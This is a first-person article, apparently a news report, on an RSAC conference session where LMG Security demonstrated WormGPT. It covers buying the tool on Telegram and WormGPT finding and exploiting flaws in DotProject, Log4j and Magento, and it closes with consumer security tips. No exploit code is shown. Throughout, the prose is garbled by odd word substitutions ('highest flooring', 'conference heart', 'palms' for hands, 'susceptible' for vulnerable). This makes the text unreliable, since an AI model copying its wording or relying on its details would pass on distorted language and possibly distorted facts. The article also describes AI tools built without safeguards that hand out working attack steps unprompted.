On the highest flooring of San Francisco’s Moscone conference heart, I’m sitting in a single row of many chairs, most already full. It’s the beginning of a day on the RSAC’s annual cybersecurity convention, and nonetheless early within the week. When the presenters take the stage, their angle is briskly skilled however energetic.
I’m anticipating a technical dive into normal AI instruments—one thing that offers an up-close take a look at how ChatGPT and its rivals are manipulated for soiled deeds. Sherri Davidoff, Founder and CEO of LMG Security, reinforces this perception together with her opener about software program vulnerabilities and exploits.
But then Matt Durrin, Director of Training and Research at LMG Security, drops an sudden phrase: “Evil AI.”
Cue a delicate file scratch in my head.
“What if hackers can use their evil AI tools that don’t have guardrails to find vulnerabilities before we have a chance to fix them?” Durrin says. “[We’re] going to show you examples.”
And not simply screenshots, although because the presentation continues, loads of these illustrate the factors made by the LMG Security crew. I’m about to see stay demos, too, of 1 evil AI particularly—WormGPT.
LMG Security / RSAC Conference
Davidoff and Durrin begin with a chronological overview of their makes an attempt to realize entry to rogue AI. The story finally ends up revealing a thread of normalcy behind what most individuals consider as darkish, shadowy corners of the web. In some methods, the session looks like a glimpse right into a mirror universe.
Durrin first describes a few unsuccessful makes an attempt to entry an evil AI. The creator of “Ghost GPT” ghosted them after receiving cost for the software. A dialog with DevilGPT’s developer made Durrin uneasy sufficient to cross on the chance.
What have we discovered to date? Most of those darkish AI instruments have “GPT” someplace of their title to lean on the model energy of ChatGPT.
The third possibility Durrin mentions bore fruit, although. After listening to about WormGPT in a 2023 Brian Krebs article, the crew dove again into Telegram’s channels to seek out it—and efficiently received their palms on it for simply $50.
“It is a very, very useful tool if you’re looking at performing something evil,” says Durrin. “[It’s] ChatGPT, but with no safety rails in place.” Want to ask it something? You really can, even when it’s damaging or dangerous.
That data isn’t too unsettling but, although. The proof is in what this AI can do.

LMG Security
Durrin and Davidoff begin by strolling us by their expertise with an older model of WormGPT from 2024. They first tossed the supply code for DotProject, an open-source challenge administration platform. It accurately recognized a SQL vulnerability and even steered a fundamental exploit for it—which didn’t work. Turns out, this older type of WormGPT couldn’t capitalize on the weaknesses it noticed, probably on account of its incapability to ingest the complete set of supply code.
Not good, however not spooky.
Next, the LMG Security crew ramped up the problem with the Log4j vulnerability, establishing an exploitable server. This model of WormGPT, which was a bit newer, discovered the distant execution vulnerability current—one other success. But once more, it fell brief on its clarification of how you can exploit, not less than for a newbie hacker. Davidoff says “an intermediate hacker” may work with this degree of data.
Not nice, however a data barrier nonetheless exists.

Newer variations of WormGPT can clarify to novice hackers how precisely to pwn a server with a Log4j vulnerability.
LMG Security / RSAC Conference
But one other, newer iteration of WormGPT? It gave detailed, specific instructions for how you can exploit the vulnerability and even generated code incorporating the pattern server’s IP tackle. And these directions labored.
Okay, that’s…dangerous?
Finally, the crew determined to provide the most recent model of WormGPT a tougher process. Its updates blow away a lot of the early variant’s limitations—now you can feed it a limiteless quantity of code, for starters. This time, LMG Security simulated a susceptible e-commerce platform (Magento), seeing if WormGPT may discover the two-part exploit.
It did. But instruments from the nice guys didn’t.
SonarQube, an open-source platform that appears for flaws in code, solely caught one potential vulnerability… nevertheless it was unrelated to the difficulty that the crew was testing for. ChatGPT didn’t catch it, both.
On high of this, WormGPT can provide a full rundown of how you can hack a susceptible Magento server, with explanations for every step, and rapidly too, as I see throughout the stay demo. The exploit is even provided unprompted.
As Davidoff says, “I’m a little nervous to see where we’re going to be with hacker AI tools in another six months, because you can just see the progress that’s been made right now over the past year.”

LMG Security’s recap of the place AI hacker instruments began, the place they’re now, and what we’re dealing with for the longer term.
LMG Security / RSAC Conference
The specialists listed here are far calmer than I’m. I’m remembering one thing Davidoff mentioned originally of the session: “We are actually in the very early infant stages of [hacker AI].”
Well, f***.
This second is once I understand that as a purpose-built software, WormGPT and related rogue AIs have a head begin in each sniffing out and capitalizing on code weaknesses. Plus, they decrease the bar for moving into profitable hacking. Now, so long as you may have cash for a subscription, you’re within the sport.
On the opposite facet, I begin questioning how constrained the nice guys are by their ethics—and their common mindset. The common speak round AI is concerning the betterment of society and humanity, slightly than how you can shield in opposition to the worst of humanity. As Davidoff identified throughout the session, AI ought to be used to assist vet code, to assist catch vulnerabilities earlier than darkish AI does.
This state of affairs is an issue for us finish customers. We are the delicate, squishy lots; we nonetheless pay (generally actually) if the programs we depend on every day aren’t well-defended. We must cope with the messy aftermath of scams, compromised bank cards, malware, and such.
The solely silver lining in all this? Those within the shadows sometimes don’t look too arduous at anybody else there with them. Cybersecurity specialists ought to be capable to nonetheless analysis and analyze these hacker AI instruments and finally enhance their very own methodologies.
In the in the meantime, you and I’ve to deal with how you can reduce splash injury every time a service, platform, or web site turns into compromised. Right now it takes many various tips—passkeys and distinctive, sturdy passwords to guard accounts (and password managers to retailer all of them); two-factor authentication; email masks to cover our actual e-mail addresses; reliable antivirus on our PCs; a VPN to make sure privateness on open or in any other case unsecure networks; momentary bank card numbers (if out there to you thru your financial institution); credit freezes; and but nonetheless extra.
It’s a ache within the butt, however sadly so essential. And it looks as if that’s solely going to turn into more true, for now.